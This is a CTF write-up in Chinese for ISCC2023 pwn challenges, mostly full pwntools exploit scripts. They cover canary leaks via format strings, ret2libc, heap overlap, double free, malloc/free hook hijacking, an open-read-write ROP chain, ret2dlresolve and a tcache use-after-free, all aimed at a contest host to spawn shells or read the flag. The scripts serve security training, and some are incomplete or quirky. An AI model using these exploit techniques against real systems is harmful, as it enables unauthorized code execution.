ISCC2023 PWN部分wp

全栈✌太多辣
按照附件编号:

attachment-11:(makewishes)

伪随机+canary保护的ret2text
exp:

from pwn import *
from ctypes import *
# Debug-level logging, amd64 packing, and a tmux split for gdb.attach().
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io=remote("59.110.164.72",10001)
# io=process("./makewishes")
# libc's srand()/rand() are called through ctypes so this script reproduces
# the same pseudo-random sequence the target generates (write-up: "伪随机").
cs=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")


# gdb.attach(io)
# pause()

io.recvuntil(b"first wish\n")
# 0xe filler bytes followed by an 8-byte zero; presumably this sets the seed
# the target later passes to srand(), which is why srand(0) is mirrored below.
payload=cyclic(0xe)+p64(0)
io.send(payload)
cs.srand(0)

io.recvuntil(b"number!\n")
# Same reduction the target presumably applies to rand(): a value in 1..9.
io.sendline(str(cs.rand()%9+1))

io.recvuntil(b"second wish!\n")
# Format-string read of the 11th stack argument; the reply is parsed as the
# canary ("0x" + 16 hex digits = 18 characters).
payload=b"%11$p"
io.sendline(payload)
canary=int(io.recv(18),16)
print("canary:  "+hex(canary))

# Re-seeded to 0 before the second number; presumably the target re-seeds as
# well -- confirm against the binary.
cs.srand(0)

io.recvuntil(b"number!\n")
io.sendline(str(cs.rand()%9+1))

io.recvuntil(b"final wish!\n")
# 0x28 bytes up to the canary slot, the leaked canary, a zero (presumably the
# saved rbp), then 0x4011d6 as the return address (the ret2text target).
payload=cyclic(0x28)+p64(canary)+p64(0)+p64(0x4011d6)
io.send(payload)

io.interactive()

attachment-12:(Login)

签到题,ret2libc
exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io=remote("59.110.164.72",10000)
# io=process("./Login")
elf=ELF("./Login")
libc=ELF("./libc-2.23.so")

# From the ROPgadget listing at the end of this section.
pop_rdi_ret=0x4008c3

io.recvuntil(b"tip: ")
# The service prints an address ("0x" + 12 hex digits); 0x3c48e0 is presumably
# that pointer's offset inside libc-2.23.so -- verify with the libc file.
libc_base=int(io.recv(14),16)-0x3c48e0
print("libc_base:  "+hex(libc_base))

# gdb.attach(io)
# pause()

sys_addr=libc_base+libc.sym[b"system"]
str_bin_sh=libc_base+next(libc.search(b"/bin/sh"))

io.recvuntil(b"username:\n")
# 0x1c filler bytes then a 32-bit value; presumably the value the username
# stage compares against (not shown on the page).
payload=cyclic(0x1c)+p32(0x15CC15CC)
io.send(payload)

io.recvuntil(b"password:\n")
# ret2libc chain: pop rdi; ret -> "/bin/sh" -> system.
payload=cyclic(0x28)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(sys_addr)
io.sendline(payload)


io.interactive()


# Gadgets information
# ============================================================
# 0x00000000004008bc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004008be : pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004008c0 : pop r14 ; pop r15 ; ret
# 0x00000000004008c2 : pop r15 ; ret
# 0x00000000004008bb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004008bf : pop rbp ; pop r14 ; pop r15 ; ret
# 0x0000000000400680 : pop rbp ; ret
# 0x00000000004008c3 : pop rdi ; ret
# 0x00000000004008c1 : pop rsi ; pop r15 ; ret
# 0x00000000004008bd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400599 : ret

# Unique gadgets found: 11

attachment-13:(usage_of_pen)

被这道题前面的比较函数恶心到了,得上网查书法知识拼拼音然后用0补齐
剩下的就是ret2libc

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])


# io=process("./usage_of_pen")
io=remote("59.110.164.72",10002)
elf=ELF("./usage_of_pen")
libc=ELF("./libc-2.23.so")


# Addresses from the ROPgadget listing below; leave_ret and read_t1 are
# defined but never used by the chains.
leave_ret=0x400942
pop_rdi=0x400c53
# Function the chains return into after each overflow so the next payload can
# be sent; presumably the one containing the vulnerable read -- not shown here.
func_addr=0x400b0f
read_t1=0x40092B
puts_got=elf.got[b"puts"]
puts_plt=elf.plt[b"puts"]

# gdb.attach(io)
# pause()

io.recvuntil(b"!\n")
# payload=b"dunbi000"
# payload=payload.ljust(40,b"+")
# payload+=b"nvfeng00"
# payload=payload.ljust(72,b"+")
# Nine 8-byte fields (72 bytes): pinyin of calligraphy stroke names, each
# zero-padded to 8 bytes, as described in the write-up above.
payload=b"dunbi000cuobi000yufeng00dunfeng0cunfeng0nvfeng00yuefeng0anfeng00jiebi000"
io.send(payload)

io.recvuntil(b"space\n")
# First overflow: 0x28 bytes, then func_addr in the return-address slot.
payload=cyclic(0x28)+p64(func_addr)
io.send(payload)

# Second overflow: puts(puts@got) leaks a libc address, then back to func_addr.
payload=cyclic(0x28)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(func_addr)
io.send(payload)

# Last 6 bytes of the printed pointer (ending in 0x7f), zero-padded to 8,
# minus puts' offset gives the libc base.
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-libc.sym[b"puts"]
print("leak_addr:  "+hex(leak_addr))

sys_addr=leak_addr+libc.sym[b"system"]
str_bin_sh=leak_addr+next(libc.search(b"/bin/sh"))

# Third overflow: system("/bin/sh").
payload=cyclic(0x28)+p64(pop_rdi)+p64(str_bin_sh)+p64(sys_addr)
io.send(payload)

io.interactive()


# Gadgets information
# ============================================================
# 0x0000000000400942 : leave ; ret
# 0x0000000000400c4c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400c4e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400c50 : pop r14 ; pop r15 ; ret
# 0x0000000000400c52 : pop r15 ; ret
# 0x0000000000400c4b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400c4f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x0000000000400800 : pop rbp ; ret
# 0x0000000000400c53 : pop rdi ; ret
# 0x0000000000400c51 : pop rsi ; pop r15 ; ret
# 0x0000000000400c4d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004006c1 : ret
# 0x0000000000400a16 : ret 0x1474
# 0x00000000004009b2 : ret 0x8b48

# Unique gadgets found: 14

attachment-14: (your_character)

edit有off by one打堆块重叠,控制堆块最后打one_gadget

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])


# Local process only in this version (no remote() line); the unconditional
# gdb.attach() further down needs the tmux terminal configured in context().
io=process("./your_character")
elf=ELF("./your_character")
libc=ELF("./libc-2.23.so")

# io.recvuntil(b"Your choice :")
# io.sendline(b"2")
# io.sendlineafter(b"character: \n",b"a")
# One initial menu answer before the helper functions below take over.
io.recvuntil(b"Your choice :")
io.sendline(b"1")

def add(n, cc):
    """Menu option 1: answer the damage prompt with *n* (decimal line) and the
    introduction prompt with the raw bytes *cc*."""
    answer_line = io.sendlineafter
    answer_line(b"Your choice :", b"1")
    answer_line(b"Damage of skill : ", str(n))
    io.sendafter(b"introduction of skill:", cc)
    
def extend(i, n):
    """Menu option 2: select entry *i*, then submit the damage value *n*."""
    dialogue = (
        (b"Your choice :", b"2"),
        (b"Index :", str(i)),
        (b"Damage of skill : ", str(n)),
    )
    for prompt, reply in dialogue:
        io.sendlineafter(prompt, reply)
    
def edit(n, cc):
    """Menu option 3: select entry *n*, then send *cc* as its new introduction.

    Note the prompt here is "introduction of skill : " (spaced), which differs
    from the one add() waits for.
    """
    for prompt, reply in ((b"Your choice :", b"3"), (b"Index :", str(n))):
        io.sendlineafter(prompt, reply)
    io.sendafter(b"introduction of skill : ", cc)
    
def show(n):
    """Menu option 4: print entry *n* (the caller reads the output)."""
    for prompt, reply in ((b"Your choice :", b"4"), (b"Index :", str(n))):
        io.sendlineafter(prompt, reply)
    
def delete(n):
    """Menu option 5: delete entry *n*."""
    for prompt, reply in ((b"Your choice :", b"5"), (b"Index :", str(n))):
        io.sendlineafter(prompt, reply)

# Debugger is attached unconditionally (this version only runs locally).
gdb.attach(io)
pause()

add(0x80,b"aaa") #0
add(0x18,b"bbb") #1
add(0x18,b"ccc") #2
add(0x18,b"ddd") #3

# 0x18 bytes of data plus one more qword: the write runs past entry 1 and,
# presumably, lands on entry 2's size field, setting it to 0x61 (the
# off-by-one overlap described in the write-up).
edit(1,b"a"*0x18+p64(0x61))
delete(2)

# Re-allocate the enlarged chunk as entry 2 (it now overlaps entry 3); fill
# 8 bytes so show() prints what follows them.
add(0x50,b"www") #2
edit(2,b"A"*0x8)
show(2)

io.recvuntil(b"A"*0x8)
# Rest of the printed line, zero-padded to 8 bytes: a heap address.
leak_addr=u64(io.recvline()[:-1].ljust(8,b"\x00"))
print("leak_addr: "+hex(leak_addr))


delete(0)

# Fixed -0xf0 delta from the leak; the overlapped region is rewritten with a
# fake 0x21 chunk header followed by heap_addr.
heap_addr=leak_addr-0xf0
edit(2,p64(0)*3+p64(0x21)+p64(0)+p64(heap_addr))
show(2)

# Libc base from the pointer show(2) now reveals; 0x3C4B20+0x58 is presumably
# a main_arena offset for this libc-2.23.so (compare the 0x3c48e0 used in the
# Login script) -- verify.
libc_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x58-0x3C4B20
print("libc_addr: "+hex(libc_addr))
one_gadget=[0x45226,0x4527a,0xf03a4,0xf1247]
shell=libc_addr+one_gadget[0]

# NOTE(review): `shell` is computed but never written anywhere; the script as
# posted ends after this edit, so the one_gadget step from the write-up is not
# actually reached here.
edit(2,b'A'*0xf0+p64(heap_addr+0x10))  


io.interactive()


# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

attachment-32:(double)

aba double free控制堆块到指定位置然后控制指定位置数据
本题注意布栈细节
f12是个好习惯,最开始没找到/bin/sh字串
exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io=remote("59.110.164.72",10021)
# io=process("./attachment-32")
elf=ELF("./attachment-32")

# `shell` is repeated as a literal (0x4008f7, "#system") in the final payload
# rather than referenced; pop_rdi_ret comes from the gadget listing but is
# never used.
shell=0x4008f7
pop_rdi_ret=0x400cb3

def add(n, s):
    """Menu option 1: drain the pending prompt with io.recv() before each of
    the three answers -- the choice, *n* and *s* -- each sent as a line."""
    for reply in (b"1", str(n), str(s)):
        io.recv()
        io.sendline(reply)
    
def edit(n, s):
    """Menu option 4: select entry *n*, then send *s* (already bytes) as the
    new content; every answer is preceded by an io.recv() of the prompt."""
    for reply in (b"4", str(n), s):
        io.recv()
        io.sendline(reply)
    
def delete(n):
    """Menu option 2: delete entry *n* (prompt drained before each answer)."""
    for reply in (b"2", str(n)):
        io.recv()
        io.sendline(reply)
    
def ex():
    """Menu option 5 (what it does is not shown on the page); the prompt is
    drained with io.recv() first."""
    _ = io.recv()
    io.sendline(b"5")
    
add(0,0x68)
add(1,0x68)
add(2,0x10)
# Double free in the order 1, 0, 1 (the write-up's "aba"), so the same chunk
# appears twice in the free list.
delete(1)
delete(0)
delete(1)

# Entry 3 is the first re-allocation of the doubly-freed chunk; its first
# qword (presumably the fastbin forward link) is pointed at 0x6021d8.
add(3,0x68)
edit(3,p64(0x6021d8))

# gdb.attach(io)
# pause()

# Two allocations drain the list; the third (entry 6) is then served from
# 0x6021d8, presumably inside the program's own data -- verify with the binary.
add(4,0x68)
add(5,0x68)
add(6,0x68)
# Values written through entry 6; the author's "#/bin/sh" note refers to the
# trailing 0xCC51CC51 / 0x400cd8 pair (exact meaning not shown on the page).
edit(6,p64(0x15CC15CC)+p64(0x400cd8)+p64(0)*6+p64(0xCC51CC51)) #/bin/sh
ex()


io.recvuntil(b"reward: ")
# "0x" + 12 hex digits of the address the service prints back.
leak_addr=int(io.recv(14),16)
print("leak_addr:  "+hex(leak_addr))
leak_addr=leak_addr+0xf0
# NOTE(review): `&` binds looser than `-` in Python, so this evaluates as
# leak_addr & (0xff-0x8) == leak_addr & 0xf7, not (leak_addr & 0xff) - 8.
# The write-up reports the exploit working against the remote; confirm which
# value was intended before reusing this line.
low=(leak_addr)&0xff-0x8
print("low: "+hex(low))
# Second-lowest byte of the adjusted address.
high=(leak_addr&0xffff)>>8
print("high: "+hex(high))


# Two-byte partial overwrite after 0x20 filler bytes, padding up to 0xf0,
# then 0x6021f8 (presumably the saved-rbp slot) and the return into 0x4008f7
# (`shell`, annotated "#system" by the author).
payload=cyclic(0x20)+p8(low)+p8(high)
payload=payload.ljust(0xf0,b"a")+p64(0x6021f8)+p64(0x4008f7) #system
io.recvuntil(b"say:\n")
io.send(payload)

io.interactive()


# Gadgets information
# ============================================================
# 0x0000000000400cac : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400cae : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400cb0 : pop r14 ; pop r15 ; ret
# 0x0000000000400cb2 : pop r15 ; ret
# 0x0000000000400cab : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400caf : pop rbp ; pop r14 ; pop r15 ; ret
# 0x00000000004007f0 : pop rbp ; ret
# 0x0000000000400cb3 : pop rdi ; ret
# 0x0000000000400cb1 : pop rsi ; pop r15 ; ret
# 0x0000000000400cad : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004006b1 : ret
# 0x0000000000400c40 : ret 0xfffc

# Unique gadgets found: 12

attachment-36:(chef)

edit存在溢出写,可以off by one构造堆块重叠
然后就是简单的劫持__malloc_hook打one_gadget
exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io=remote("59.110.164.72", 10031)
# io=process("./chef")
elf=ELF("./chef")
# Same libc-2.23 build as the other amd64 challenges; its symbol offsets are
# used for the leak arithmetic below.
libc=ELF("./libc-2.23.so")

def menu():
    """Send choice 4 at the menu prompt (the same choice delete() uses,
    without an index)."""
    io.sendlineafter(b"Your choice:", b"4")
    
def show():
    """Menu option 1: list entries (the caller parses the output)."""
    io.sendlineafter(b"Your choice:", b"1")
    
def add(n, cc):
    """Menu option 2: answer the price prompt with *n* and the name prompt
    with the raw bytes *cc* (sent without a trailing newline)."""
    for prompt, reply in ((b"Your choice:", b"2"), (b"price of food:", str(n))):
        io.sendlineafter(prompt, reply)
    io.sendafter(b"name of food:", cc)
    
def edit(n, s, cc):
    """Menu option 3: select entry *n*, give price *s* (prompt is
    "price of food :", with a space), then send the raw name bytes *cc*."""
    dialogue = (
        (b"Your choice:", b"3"),
        (b"index of food:", str(n)),
        (b"price of food :", str(s)),
    )
    for prompt, reply in dialogue:
        io.sendlineafter(prompt, reply)
    io.sendafter(b"name of food:", cc)

def delete(n):
    """Menu option 4: delete entry *n*."""
    for prompt, reply in ((b"Your choice:", b"4"), (b"index of food:", str(n))):
        io.sendlineafter(prompt, reply)
    
# Choice 4 once before any allocation; presumably the first menu shown differs
# from the later one (not shown on the page).
menu()

# gdb.attach(io)
# pause()    

add(0x18,b"aaa") #0
add(0x40,b"bbb") #1
add(0x30,b"ccc") #2
add(0x10,b"eee") #3

show()
# Length 0x19 for an entry created with 0x18, followed by four qwords: the
# last one (0x91) presumably lands on entry 1's size field so that chunk now
# spans entry 2 as well (the overflowing edit from the write-up).
edit(0,0x19,p64(0)*3+p64(0x91))
delete(1)
# Re-allocate entry 1 with 7 bytes of name; show() then prints the pointer the
# free left right after those bytes.
add(0x40,b"b"*7)
show()

# Libc base: the printed pointer is taken to be __malloc_hook + 0x68 in this
# libc-2.23.so -- confirm with the libc file.
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x68-libc.sym[b"__malloc_hook"]
print("leak_addr: "+hex(leak_addr))
malloc_hook=leak_addr+libc.sym[b"__malloc_hook"]
one_gadget=[0x45226,0x4527a,0xf03a4,0xf1247]
shell=leak_addr+one_gadget[1]

add(0x60,b"qqq") #4
add(0x60,b"www") #5
add(0x60,b"eee") #6

delete(4)

# Entry 3's edit overflows into freed entry 4: a fake size 0x71 and a forward
# link of malloc_hook-0x23 (constant as given by the author).
payload=cyclic(0x10)+p64(0)+p64(0x71)+p64(malloc_hook-0x23)
edit(3,len(payload),payload)
add(0x60,p64(shell))
# The second 0x60 allocation is served from the fake chunk; by the author's
# arithmetic (malloc_hook-0x23 + 0x10 header + 0x13 filler) `shell` lands
# exactly on __malloc_hook.
add(0x60,cyclic(0x13)+p64(shell))

delete(5)

# One more allocation (menu 2, price 96 == 0x60) runs the hooked malloc; the
# name prompt is left to interactive().
io.sendlineafter(b"Your choice:",b"2")
io.sendlineafter(b"price of food:",b"96")
# io.sendlineafter(b"name of food:",b"1")

io.interactive()
    

# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

attachment-37: (Trapped)

开启沙盒禁用execve(),需要构造orw rop链
同时也开启canary保护,可以利用格式化字符串泄露
注意额外构造read在bss段读入'/flag'字串给orw做参数用
exp:

# (author's note) running this locally with the debugger attached always
# breaks at the input step.
from pwn import*
context(log_level='debug',arch='amd64',os='linux',terminal=['tmux','splitw','-h'])


# io=process("./Trapped")
io=remote("59.110.164.72", 10066)
elf=ELF("./Trapped")
libc=ELF("./libc-2.23.so")

# From the gadget listing below; pop_rsi_r15 is not used by the chains.
pop_rdi_ret=0x400a23
pop_rsi_r15=0x400a21

io.recvuntil(b"larger box\n")
# Format-string leak of the 9th argument; "aaaa" is a marker to sync on.
payload=b"aaaa%9$p"
io.send(payload)
io.recvuntil(b"aaaa")
canary=int(io.recv(18),16)
print("canary:  "+hex(canary))

io.recvuntil(b"larger box\n")
payload=b"99"
io.send(payload)
io.recvuntil(b"about\n")
# Overflow #1: keep the canary, puts(puts@got) for the libc leak, then return
# to 0x400777 so the same input path runs again.
payload=cyclic(0x28)+p64(canary)+p64(0)+p64(pop_rdi_ret)+p64(elf.got[b"puts"])+p64(elf.plt[b"puts"])+p64(0x400777)
io.send(payload)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-libc.sym[b"puts"]
print("leak_addr: "+hex(leak_addr))

# Gadget offsets inside libc-2.23.so (not part of the binary's listing below).
pop_rdx_ret=0x01b92+leak_addr
pop_rsi_ret=0x202f8+leak_addr
# pop3_ret, bss_len, para and mprotect are defined but never used.
pop3_ret=0x400a1e
bss_addr=0x601100
bss_len=0x1000
para=0x7
open_addr=libc.sym[b"open"]+leak_addr
write_addr=libc.sym[b"write"]+leak_addr
read_addr=libc.sym[b"read"]+leak_addr
mprotect=libc.sym[b"mprotect"]+leak_addr

# gdb.attach(io)
# pause()


io.recvuntil(b"about\n")
# Overflow #2: read(0, bss_addr, ?) through the binary's own read symbol to
# store the path; rdx is not set in this chain, so the length is whatever the
# register holds at that point (not shown on the page).
payload=cyclic(0x28)+p64(canary)+p64(0)+p64(pop_rdi_ret)+p64(0)+p64(pop_rsi_ret)+p64(bss_addr)+p64(elf.sym[b"read"])+p64(0x400777)
io.send(payload)
# No explicit terminator: relies on the .bss area at 0x601100 still being zero.
payload=b"/flag"
# payload=payload.ljust(0x100,b"\x00")
io.send(payload)


io.recvuntil(b"about\n")
payload=cyclic(0x28)+p64(canary)+p64(0)
#o
# open(bss_addr -> "/flag", 0)
payload+=p64(pop_rdi_ret)+p64(bss_addr)+p64(pop_rsi_ret)+p64(0)+p64(open_addr)
#r
# read(3, bss_addr+0x160, 0x50): fd 3 assumes open() returned the first free
# descriptor.
payload+=p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(bss_addr+0x160)+p64(pop_rdx_ret)+p64(0x50)+p64(read_addr)
#w
# write(1, bss_addr+0x160, 0x50)
payload+=p64(pop_rdi_ret)+p64(1)+p64(pop_rsi_ret)+p64(bss_addr+0x160)+p64(pop_rdx_ret)+p64(0x50)+p64(write_addr)
io.send(payload)
io.recv()


io.interactive()


# Gadgets information
# ============================================================
# 0x0000000000400a1c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400a1e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400a20 : pop r14 ; pop r15 ; ret
# 0x0000000000400a22 : pop r15 ; ret
# 0x0000000000400a1b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400a1f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x00000000004006f8 : pop rbp ; ret
# 0x0000000000400a23 : pop rdi ; ret
# 0x0000000000400a21 : pop rsi ; pop r15 ; ret
# 0x0000000000400a1d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040060e : ret
# 0x0000000000400682 : ret 0x2009
# 0x0000000000400960 : ret 0x2be
# 0x000000000040062b : jmp 0x400610
# 0x0000000000400775 : jmp 0x400700
# 0x00000000004008f5 : jmp 0x4008f8
# 0x000000000040099d : jmp 0x4009ad
# 0x0000000000400c0b : jmp qword ptr [rbp]
# 0x00000000004008a9 : jmp qword ptr [rsi - 0x39]
# 0x00000000004006f1 : jmp rax

# Unique gadgets found: 13

attachment-38:(忘了叫啥了,dlresolve的题)

可以用pwntools的自动化工具打通
佩服手动构造的orz

from pwn import *
# 32-bit target (arch='x86'); context.binary below also derives this from the ELF.
context(log_level='debug',arch='x86',terminal=['tmux','splitw','-h'])

io=remote("59.110.164.72", 10067)
# io=process("./attachment-38")
context.binary=elf=ELF("./attachment-38")
rop=ROP("./attachment-38")

# Taken from the gadget listing below; none of these four are used once the
# chain is generated by pwntools (they belong to the commented manual attempt).
bss_addr=0x804A01C
leave_ret=0x8048378
pop_ebp_ret=0x80484ab
pop3_ret=0x80484a9

# pwntools builds the forged dynamic-linker structures for system("/bin/sh");
# the chain first read()s that data to dlresolve.data_addr, then resolves.
dlresolve=Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh\x00'])
rop.read(0,dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)


# gdb.attach(io)
# pause()


log.info(rop.dump())
# Chain at offset 76 (the overflow distance), dlresolve data at offset 256;
# presumably the bytes after the chain are what the read() above consumes
# from stdin once it runs -- verify.
payload=flat({76:rop.chain(),256:dlresolve.payload})
io.send(payload)

# read_plt=elf.plt[b"read"]

# payload=cyclic(0x48)+p32(bss_addr)+p32(read_plt)+p32(pop3_ret)+p32(0)+p32(bss_addr)+p32(0x100)


io.interactive()

# Gadgets information
# ============================================================
# 0x08048378 : leave ; ret
# 0x080484ab : pop ebp ; ret
# 0x080484a8 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
# 0x080482c9 : pop ebx ; ret
# 0x080484aa : pop edi ; pop ebp ; ret
# 0x080484a9 : pop esi ; pop edi ; pop ebp ; ret
# 0x080482b2 : ret
# 0x0804838e : ret 0xeac1
# 0x08048568 : ret 0xfffe

# Unique gadgets found: 9

attachment-39:(SIMS)

UAF的tcachebin attack,劫持__free_hook打one_gadget
最后多次edit是我找不到chunk下标了,孩子不懂摁着玩的
exp:

from pwn import *
from ctypes import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io=remote("59.110.164.72",10085)
# io=process("./SIMS")
elf=ELF("./SIMS")
libc=ELF("./libc-2.27.so")
# The same libc the target uses, loaded via ctypes to reproduce its rand().
cs=cdll.LoadLibrary("./libc-2.27.so")

io.recvuntil(b"password:\n")
# First rand() without any srand(): glibc's default-seed sequence.
rd=cs.rand()
print("rd:  "+str(rd))
# for i in range(1,36569646000):
#     if rd^i==0x15cc15cc:
#         ps=i
#         break
#     else:
#         continue
# Constant found by the (commented-out) search above. XOR is its own inverse,
# so the same value is simply rd ^ 0x15cc15cc; for glibc's usual first
# default-seed rand() value 1804289383 that gives 2118602923.
ps=2118602923
# Sanity print: expected to show 0x15cc15cc.
print("ans:  "+hex(ps^rd))
io.sendline(str(ps))

def add(n):
    """Menu option 1: create an entry of size *n* (sent as a decimal line)."""
    for prompt, reply in ((b"one!\n", b"1"), (b"Stu:\n", str(n))):
        io.sendlineafter(prompt, reply)

def delete(n):
    """Menu option 2: delete entry *n*."""
    for prompt, reply in ((b"one!\n", b"2"), (b"Index:\n", str(n))):
        io.sendlineafter(prompt, reply)
    
def edit(n, cc):
    """Menu option 3: select entry *n*, then send *cc* as its content (raw,
    no trailing newline)."""
    for prompt, reply in ((b"one!\n", b"3"), (b"Index:\n", str(n))):
        io.sendlineafter(prompt, reply)
    io.sendafter(b"Content of Stu:\n", cc)
    
def show(n):
    """Menu option 4: print entry *n* (the caller reads the output)."""
    for prompt, reply in ((b"one!\n", b"4"), (b"Index:\n", str(n))):
        io.sendlineafter(prompt, reply)
    
# gdb.attach(io)
# pause()

# Eight 0x90 entries, each holding "/bin/sh"; entry 8 below is the one whose
# delete() finally goes through the hook.
for i in range(8):
    add(0x90)
    edit(i,b"/bin/sh")
    
add(0x90) #8
# NOTE(review): str here while every other edit() passes bytes; pwntools
# encodes it, but b"/bin/sh" would be consistent with the loop above.
edit(8,"/bin/sh")

# Free all eight; with libc-2.27 presumably seven go to tcache and the eighth
# elsewhere, which is why show(7) yields a libc pointer (write-up: UAF).
for i in range(8):
    delete(i)
    
show(7)
# Leaked pointer is taken to be __malloc_hook + 0x70 in this libc-2.27.so.
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x70-libc.sym[b"__malloc_hook"]
print("leak_addr: "+hex(leak_addr))
# malloc_hook, realloc, one_gadget and shell are computed but never used; the
# final step installs system at __free_hook instead of a one_gadget.
malloc_hook=leak_addr+libc.sym[b"__malloc_hook"]
free_hook=leak_addr+libc.sym[b"__free_hook"]
realloc=leak_addr+libc.sym[b"__libc_realloc"]
sys_addr=leak_addr+libc.sym[b"system"]
one_gadget=[0x4f2a5,0x4f302,0x10a2fc]
shell=leak_addr+one_gadget[1]

# for i in range(0,6):
#     add(0x90)

# Write-after-free on entry 6: its first qword (presumably the tcache next
# pointer) is set to free_hook, so one of the two allocations below is served
# from __free_hook.
edit(6,p64(free_hook))
add(0x90) #9  
add(0x90) #10
# The author could not tell which index ended up at __free_hook, so every
# index 0..7 is written with system's address (see the write-up's remark).
edit(0,p64(sys_addr)) 
edit(1,p64(sys_addr)) 
edit(2,p64(sys_addr)) 
edit(3,p64(sys_addr)) 
edit(4,p64(sys_addr)) 
edit(5,p64(sys_addr)) 
edit(6,p64(sys_addr)) 
edit(7,p64(sys_addr)) 
# edit(8,p64(sys_addr)) 
# add(0x90) #9
# add(0x90) #10
# add(0x90) #11
# free() of the "/bin/sh" entry now goes through the hook -> system("/bin/sh").
delete(8)

io.interactive()

# 0x4f2a5 execve("/bin/sh", rsp+0x40, environ)
# constraints:
#   rsp & 0xf == 0
#   rcx == NULL

# 0x4f302 execve("/bin/sh", rsp+0x40, environ)
# constraints:
#   [rsp+0x40] == NULL

# 0x10a2fc execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL